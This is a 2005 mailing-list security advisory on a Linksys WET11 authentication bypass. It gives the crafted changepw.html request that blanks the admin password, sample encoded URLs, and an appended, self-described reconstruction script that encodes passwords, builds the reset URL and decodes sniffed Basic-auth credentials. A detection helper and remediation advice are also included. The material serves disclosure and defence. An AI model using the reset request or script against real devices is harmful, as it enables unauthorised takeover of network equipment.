From: SecuriTeam <support@securiteam.com>
To: [email protected]
Date: 10 Apr 2005 13:23:59 +0200
Subject: [NEWS] Cisco Linksys WET11 Password Resetting
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050410103749.9041257E8@mail.tyumen.ru>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Cisco Linksys WET11 Password Resetting
------------------------------------------------------------------------
SUMMARY
<http://www.linksys.com/products/product.asp?grid=33&scid=36&prid=602>
Linksys WET11 is "an Ethernet wireless bridge". It is possible to bypass
the authentication mechanism used by the Linksys WET11 by sending a
single crafted HTTP GET request to its web interface.
DETAILS
Vulnerable Systems:
* Linksys WET11 v1 (revisions prior to 1.5.4)
The change-password page on the device submits the new password over HTTP
GET, as an obfuscated value in the query-string parameter of changepw.html.
The parameter that holds the password is named data.
The following is the URL issued when the user changes the password to
"admin":
http://x.x.x.x/changepw.html?data=XVQsZV3.................
The encoding is quite predictable; here are the URLs produced for the
passwords "a" through "h" (note that the first character advances every
four letters while the second cycles through P, f, v and '.', i.e. six bits
per output character, as in base64 but with a non-standard alphabet):
http://x.x.x.x/changepw.html?data=XP......................
http://x.x.x.x/changepw.html?data=Xf......................
http://x.x.x.x/changepw.html?data=Xv......................
http://x.x.x.x/changepw.html?data=Y.......................
http://x.x.x.x/changepw.html?data=YP......................
http://x.x.x.x/changepw.html?data=Yf......................
http://x.x.x.x/changepw.html?data=Yv......................
http://x.x.x.x/changepw.html?data=Z.......................
An attacker who is already on the network does not even need this: the
device uses HTTP Basic authentication, so the username and password travel
base64-encoded (not encrypted) in every management request and can be
decoded from sniffed packets, bypassing the password mechanism entirely.
However, it is also possible to change the password blindly on this device
with the following request:
http://x.x.x.x/changepw.html?data=........................
The above URL sets a blank password and allows you to log in without
knowing the old one: the device performs no verification of the old
password when the password is changed. In the newest firmware, version
1.5.4 for the WET11 v1, someone must have logged in recently for this to
work (the session timeout is long, though); otherwise the device asks for
the old password.
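The following is an added example, not code from the advisory, from the reporter or from Linksys. It reconstructs the data encoding from the sample URLs above: a base64-style scheme whose alphabet starts with '.' (value 0), then A-Z, a-z and 0-9, applied to an 18-byte field that the device pads with NUL bytes. Every one of those positions is pinned down by the "admin" and "a" through "h" samples (the code reproduces XVQsZV3... and XP, Xf, Xv, Y., YP, Yf, Yv, Z. exactly); the symbol for value 63 ('/') never occurs in the samples and is an assumption, and the 18-byte field length is inferred from the fixed 24-character output. The request-line parser and the sample Basic-auth header are constructed for illustration.

```python
"""Reconstruction of the WET11 changepw.html 'data' encoding (added example).

Inferred from the sample URLs in the advisory:
  * symbol 0 is '.', 1-26 are 'A'-'Z', 27-52 are 'a'-'z', 53-62 are '0'-'9';
    symbol 63 never appears in the samples, so '/' is an ASSUMPTION;
  * each sample is 24 symbols (144 bits), so the password is carried in an
    18-byte field that the device pads with NUL bytes (also inferred).
Also decodes the Basic-auth header an on-path attacker can sniff.
"""
import base64
import re

ALPHABET = ("." + "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
            + "abcdefghijklmnopqrstuvwxyz" + "0123456789" + "/")
FIELD_LEN = 18                   # bytes; 18 * 8 / 6 == 24 symbols
DATA_LEN = FIELD_LEN * 8 // 6    # 24


def encode_wet11(password: str) -> str:
    """Obfuscate a password the way the WET11 change-password page does."""
    raw = password.encode("ascii")
    if len(raw) > FIELD_LEN:
        raise ValueError(f"password longer than the {FIELD_LEN}-byte field")
    bits = "".join(f"{b:08b}" for b in raw.ljust(FIELD_LEN, b"\x00"))
    # six bits per output symbol, most significant bits first
    return "".join(ALPHABET[int(bits[i:i + 6], 2)]
                   for i in range(0, len(bits), 6))


def decode_wet11(data: str) -> str:
    """Recover the cleartext password from a 'data' value."""
    if len(data) != DATA_LEN or any(c not in ALPHABET for c in data):
        raise ValueError("not a WET11 data value")
    bits = "".join(f"{ALPHABET.index(c):06b}" for c in data)
    raw = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return raw.rstrip(b"\x00").decode("ascii")


def changepw_url(host: str, password: str) -> str:
    """Build the GET request that sets `password`; '' blanks it.
    (Only the assumed '/' symbol would need percent-encoding.)"""
    return f"http://{host}/changepw.html?data={encode_wet11(password)}"


# Constructed request-line pattern for detection on sniffed traffic.
_REQ = re.compile(r"^GET /changepw\.html\?data=([^ &]+) HTTP/1\.[01]$")


def password_reset_in_request(request_line: str):
    """Given the first line of a sniffed HTTP request, return the new
    password being set, '' for a blanking request, or None if the line is
    not a WET11 password change.  Usable as a simple detection check."""
    m = _REQ.match(request_line.strip())
    if not m:
        return None
    try:
        return decode_wet11(m.group(1))
    except ValueError:
        return None


def basic_auth_credentials(header_value: str):
    """Decode an 'Authorization: Basic <b64>' value into (user, password)."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic authentication")
    user, _, password = base64.b64decode(token).decode("latin-1").partition(":")
    return user, password


if __name__ == "__main__":
    # Constructed sample traffic, not captured from a real device.
    print(changepw_url("x.x.x.x", "admin"))   # XVQsZV3 followed by 17 dots
    print(changepw_url("x.x.x.x", ""))        # 24 dots: blank password
    print(password_reset_in_request(
        "GET /changepw.html?data=" + "." * 24 + " HTTP/1.1"))
    print(basic_auth_credentials("Basic YWRtaW46YWRtaW4="))
```

Because the field is fixed-size and NUL-padded, any password shorter than 18 bytes ends in a run of '.' characters, which is why the blanking request is simply 24 dots; the same property makes a change-password request easy to spot on the wire.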
Solution:
Upgrade to the latest firmware, which deters blind password resets. Be
aware that even 1.5.4 still does not ask for the old password when the
password is changed, and that the management interface is plain HTTP with
Basic authentication, so anyone who can sniff or reach an active management
session can still take over the device; administer it only from a trusted
network and do not leave a session logged in. The latest firmware can be
obtained from:
<http://www.linksys.com/download/firmware.asp>
ADDITIONAL INFORMATION
The information has been provided by
<mailto:khermansen@ht-technology.com> Kristian Hermansen.
This bulletin is sent to members of the SecuriTeam mailing list.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.